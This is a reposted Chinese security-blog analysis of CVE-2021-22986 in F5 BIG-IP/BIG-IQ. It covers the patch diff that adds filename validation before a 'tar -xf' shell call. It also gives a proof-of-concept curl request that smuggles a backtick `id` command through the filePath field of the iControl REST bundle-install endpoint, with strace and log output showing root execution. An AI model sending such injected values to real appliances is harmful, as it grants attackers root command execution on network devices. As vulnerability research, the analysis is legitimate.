CVE-2021-22986 F5 BIG-IP/BIG-IQ RCE

admin
admin
admin
138876
文章
114
评论
2021年6月10日20:16:40评论68 views字数 4571阅读15分14秒阅读模式


CVE-2021-22986 F5 BIG-IP/BIG-IQ RCE


        此漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。此漏洞只能通过控制平面利用,而不能通过数据平面利用。剥削可能导致完全的系统危害。设备模式下的BIG-IP系统也容易受到攻击。


CVE-2021-22986 F5 BIG-IP/BIG-IQ RCE


CVE-2021-22986


        从补丁分析和测试来看,此漏洞似乎涉及某种身份验证绕过甚至SSRF。下面的完整上下文修补程序已对其行号进行了调整,以供在调试器中使用。


RCE


        这是命令中的认证后根命令注入tar(1)

修补


        过滤将应用于用户控制的taskState.filePath参数

[snip]+  private static final Pattern validFilePathChars = Pattern.compile("(^[a-zA-Z][a-zA-Z0-9_.\-\s()]*)\.([tT][aA][rR]\.[gG][zZ])$");[snip]   private void validateGzipBundle(final IAppBundleInstallTaskState taskState) {     if (Utilities.isNullOrEmpty(taskState.filePath)) {       File agcUseCasePackDir = new File("/var/apm/f5-iappslx-agc-usecase-pack/");       if (!agcUseCasePackDir.exists() || !agcUseCasePackDir.isDirectory()) {         String error = "Access Guided Configuration use case pack not found on BIG-IP. Please upload and install the pack.";         failTask(taskState, error, "");         return;       }       File[] agcUseCasePack = agcUseCasePackDir.listFiles();       if (agcUseCasePack == null || agcUseCasePack.length == 0 || !agcUseCasePack[0].isFile()) {
         String error = "Access Guided Configuration use case pack not found on BIG-IP. Please upload and install the pack.";         failTask(taskState, error, "");         return;       }       taskState.filePath = agcUseCasePack[0].getPath();     }
+    String filename = taskState.filePath.substring(taskState.filePath.lastIndexOf('/') + 1);+    Matcher m = validFilePathChars.matcher(filename);+    if (!m.matches()) {+      String errorMessage = String.format("Access Guided Configuration use case pack validation failed: the file name %s must begin with alphabet, and only contain letters, numbers, spaces and/or special characters (underscore (_), period (.), hyphen (-) and round brackets ()). Only a .tar.gz file is allowed", new Object[] { filename });++++      failTask(taskState, errorMessage, "");++      return;+    }     final String extractTarCommand = "tar -xf " + taskState.filePath + " -O > /dev/null";

     ShellExecutor extractTar = new ShellExecutor(extractTarCommand);
     CompletionHandler<ShellExecutionResult> executionFinishedHandler = new CompletionHandler<ShellExecutionResult>()       {         public void completed(ShellExecutionResult extractQueryResult)         {           if (extractQueryResult.getExitStatus().intValue() != 0) {             String error = extractTarCommand + " failed with exit code=" + extractQueryResult.getExitStatus();

             IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, "Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive.", error + "stdout + stderr=" + extractQueryResult.getOutput());

             return;           }

           taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.QUERY_INSTALLED_RPM;           IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState);         }

         public void failed(Exception ex, ShellExecutionResult rpmQueryResult) {           IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, "Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive.", String.format("%s failed", new Object[] { this.val$extractTarCommand }) + RestHelper.throwableStackToString(ex));         }       };


     extractTar.startExecution(executionFinishedHandler);   }[snip]


PoC


        受影响的端点为/mgmt/tm/access/bundle-install-tasks

wvu@kharak:~$ curl -ksu admin:[redacted] https://192.168.123.134/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"`id`"}' | jq .{  "filePath": "`id`",  "toBeInstalledAppRpmsIndex": -1,  "id": "36671f83-d1be-4f5a-a2e6-7f9442a2a76f",  "status": "CREATED",  "userReference": {    "link": "https://localhost/mgmt/shared/authz/users/admin"  },  "identityReferences": [    {      "link": "https://localhost/mgmt/shared/authz/users/admin"    }  ],  "ownerMachineId": "ac2562f0-e41f-4652-ba35-6a2b804b235e",  "generation": 1,  "lastUpdateMicros": 1615930477819656,  "kind": "tm:access:bundle-install-tasks:iappbundleinstalltaskstate",  "selfLink": "https://localhost/mgmt/tm/access/bundle-install-tasks/36671f83-d1be-4f5a-a2e6-7f9442a2a76f"}wvu@kharak:~$


        该id(1)命令以root用户身份执行

[pid 64748] execve("/bin/tar", ["tar", "-xf", "uid=0(root)", "gid=0(root)", "groups=0(root)", "context=system_u:system_r:initrc_t:s0", "-O"], [/* 9 vars */]) = 0


        可能会出现错误/var/log/restjavad.0.log

[SEVERE][10029][16 Mar 2021 21:34:37 UTC][8100/tm/access/bundle-install-tasks IAppBundleInstallTaskCollectionWorker] Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive. error details: tar -xf `id` -O > /dev/null failedorg.apache.commons.exec.ExecuteException: Process exited with an error: 2 (Exit value: 2)  at org.apache.commons.exec.DefaultExecutor.executeInternal(DefaultExecutor.java:404)  at org.apache.commons.exec.DefaultExecutor.access$200(DefaultExecutor.java:48)  at org.apache.commons.exec.DefaultExecutor$1.run(DefaultExecutor.java:200)  at java.lang.Thread.run(Thread.java:748)



RCE更新


        Rich Warren使用SSRF制作了完整的RCE链


参考文献:

https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986


本文始发于微信公众号(Khan安全攻防实验室):CVE-2021-22986 F5 BIG-IP/BIG-IQ RCE

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年6月10日20:16:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2021-22986 F5 BIG-IP/BIG-IQ RCEhttps://cn-sec.com/archives/293745.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息